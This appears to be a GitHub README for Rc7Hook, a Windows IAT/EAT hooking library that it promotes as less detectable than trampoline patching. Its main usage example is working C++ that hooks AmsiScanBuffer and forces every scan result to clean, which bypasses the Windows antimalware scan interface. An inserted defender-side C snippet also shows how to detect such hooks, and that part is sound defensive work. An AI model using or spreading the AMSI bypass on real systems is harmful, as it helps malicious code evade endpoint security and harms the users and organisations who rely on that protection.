internetangel/Rc7Hook

Rc7Hook

A Patchless Windows API Hooking Library.

How It Works

Rc7Hook combines IAT hooking and EAT hooking so that calls to the target function, whether resolved through a module's import table or looked up through the export table, are redirected to the specified hook procedure.

This means there is no need to patch the function's code with a trampoline, which is more detectable.
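As an added example, not code from the Rc7Hook project, here is a defender-side check for the technique described above: an EAT hook rewrites an export's RVA so that it no longer lands inside the exporting module, and an IAT hook leaves an import slot resolving outside that module, so both redirections can be spotted without looking for byte patches. The sample module image and its values are constructed; the export directory layout matches IMAGE_EXPORT_DIRECTORY from winnt.h.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Field layout of the PE export directory (same as IMAGE_EXPORT_DIRECTORY in winnt.h). */
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals;
} ExportDir;

/* Count export entries whose RVA does not land inside the module image.
 * A legitimate forwarder RVA points into the export data directory itself;
 * an EAT hook that redirects to code in another module does not, so its
 * RVA (hook address minus module base) falls outside [0, SizeOfImage). */
size_t count_eat_redirects(const uint8_t *image, uint32_t size_of_image,
                           uint32_t export_rva, uint32_t export_size) {
    const ExportDir *ed = (const ExportDir *)(image + export_rva);
    const uint32_t *funcs = (const uint32_t *)(image + ed->AddressOfFunctions);
    size_t hits = 0;
    for (uint32_t i = 0; i < ed->NumberOfFunctions; i++) {
        uint32_t rva = funcs[i];
        if (rva == 0) continue;                              /* empty ordinal slot */
        int forwarder = rva >= export_rva && rva < export_rva + export_size;
        if (!forwarder && rva >= size_of_image) hits++;
    }
    return hits;
}

/* The matching IAT check: the pointer stored in an import slot must lie inside
 * the image of the module that is supposed to export that function. */
int iat_entry_redirected(uintptr_t resolved, uintptr_t module_base, uint32_t size_of_image) {
    return resolved < module_base || resolved >= module_base + size_of_image;
}

/* Constructed sample module: 0x2000-byte image, export directory at RVA 0x100
 * (size 0x80), three exports: real code (0x1000), a forwarder string (0x140),
 * and an RVA left behind by redirecting the export to code in another module. */
size_t scan_constructed_module(void) {
    static uint8_t image[0x2000];
    memset(image, 0, sizeof image);
    ExportDir *ed = (ExportDir *)(image + 0x100);
    ed->NumberOfFunctions = 3;
    ed->AddressOfFunctions = 0x200;
    uint32_t *funcs = (uint32_t *)(image + 0x200);
    funcs[0] = 0x1000;        /* genuine export inside the image */
    funcs[1] = 0x140;         /* forwarder: inside the export directory, not a hook */
    funcs[2] = 0x7ff60000;    /* hook address minus base: far beyond SizeOfImage */
    return count_eat_redirects(image, sizeof image, 0x100, 0x80);
}
```

On a live system the same two checks run over each loaded module's in-memory export directory and each module's import table, using the module bases and SizeOfImage values from the PE headers.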

Running The Examples

```
Rc7hook.exe <EXAMPLE>
```

Examples:
- MessageBoxHook
- AmsiHook

Usage

AmsiScanBuffer Hook | Bypassing AMSI

```cpp
#include <windows.h>
#include <amsi.h>
#include <stdio.h>
#include "Rc7Hook.h"   // the library's header; file name assumed

// Signature of the original AmsiScanBuffer, used to call through to it from the hook.
// WINAPI matches the export's calling convention on x86 (it is a no-op on x64).
typedef HRESULT(WINAPI* typeAmsiScanBuffer)(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length,
                                            LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT* result);

typeAmsiScanBuffer orgAmsiScanBuffer;

HRESULT WINAPI hookAmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT* result) {
	// Let the real scan run, then overwrite its verdict.
	HRESULT orgCallResult = orgAmsiScanBuffer(amsiContext, buffer, length, contentName, amsiSession, result);

	(*result) = AMSI_RESULT_CLEAN;

	return orgCallResult;
}

void bypassAmsi() {

	// assuming that amsi.dll is loaded

	// Module name, export name, hook procedure, and where to store the original address.
	Rc7Hook amsiScanBufferHook{ "amsi.dll", "AmsiScanBuffer", hookAmsiScanBuffer, (PVOID*)&orgAmsiScanBuffer };

	if (amsiScanBufferHook.Enable()) {
		printf("[+] Enabled AmsiScanBuffer Hook!\n");
	}
	else {
		printf("[-] Failed to Enable AmsiScanBuffer Hook.\n");
	}

	printf("[*] Press a Key to Unhook.\n");
	getchar();

	if (amsiScanBufferHook.Disable()) {
		printf("[+] Disabled AmsiScanBuffer Hook!\n");
	}
	else {
		printf("[-] Failed to disable AmsiScanBuffer Hook.\n");
	}
}
```

Issues

- x86 build's unhooking produces ERROR_ACCESS_VIOLATION

Credits

EAT Hooking Article by Codereversing.
